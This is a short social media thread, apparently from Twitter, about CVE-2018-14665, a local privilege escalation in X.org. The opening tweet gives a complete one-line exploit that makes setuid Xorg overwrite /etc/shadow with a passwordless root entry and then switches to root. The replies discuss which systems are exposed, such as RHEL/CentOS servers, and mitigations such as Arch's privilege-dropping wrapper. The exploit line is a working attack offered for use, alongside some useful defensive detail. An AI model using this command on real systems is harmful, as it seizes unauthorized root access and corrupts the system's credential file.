#CVE-2018-14665 - a LPE exploit via http://X.org fits in a tweet
cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su
Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
To be fair, Xorg needs to be setuid for this to work, which it hasn't been for a while on most end-user distros. Servers distros, like redhat/centos, is a different story.
1
2
21
You’re unable to view this Tweet because this account owner limits who can view their Tweets. Learn more
On Arch, the /usr/lib/Xorg.wrap binary is setuid but it drops its privileges before calling execv on /usr/lib/Xorg (where the bug resides) and pass file descriptors so that it can do its job unprivileged. Problem completely mitigated unless you modify /etc/X11/Xwrapper.config.
It drops privileges in a supported environment including systemd-logind for handing out input device access and a driver supporting this. For example, it won't drop root with the nvidia driver.